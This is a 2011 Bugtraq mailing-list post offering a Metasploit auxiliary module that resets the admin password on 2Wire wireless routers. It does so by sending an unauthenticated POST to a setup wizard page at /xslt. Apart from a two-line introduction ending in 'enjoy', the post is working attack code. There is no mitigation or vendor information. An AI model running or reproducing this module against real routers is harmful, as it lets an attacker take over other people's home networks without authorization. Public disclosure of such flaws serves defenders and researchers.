[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
2wire password reset module
- To: bugtraq@xxxxxxxxxxxxxxxxx
- Subject: 2wire password reset module
- From: techhelperjax@xxxxxxxxx
- Date: Wed, 22 Jun 2011 18:22:31 GMT
attached is a metasploit module I coded to reset the admin password on a
2wire wireless router. enjoy
==============================================================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
'Description' => %Q{
This module will reset the admin password on a 2wire
wireless router. This works by using a setup wizard
page that fails to check if a user is authenicated and doesn't
remove or block after first access.
},
'Author' => 'Travis Phillips',
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(80),
OptString.new('PASSWORD', [ true, 'What you want the password
reset to', 'admin'])
], self.class)
end
def run
begin
print_status("Attempting to rest password to #{datastore['PASSWORD']}
on #{rhost}\n")
res = send_request_cgi(
{
'method' => 'POST',
'uri' => '/xslt',
'data' =>
'PAGE=H04_POST&THISPAGE=H04&NEXTPAGE=A01&PASSWORD=' + datastore['PASSWORD'] +
'&PASSWORD_CONF=' + datastore['PASSWORD'] + '&HINT=',
}, 25)
if (res.code == 200)
if (res.headers['Set-Cookie'])
print_status("Password reset successful!\n")
end
end
end
end
end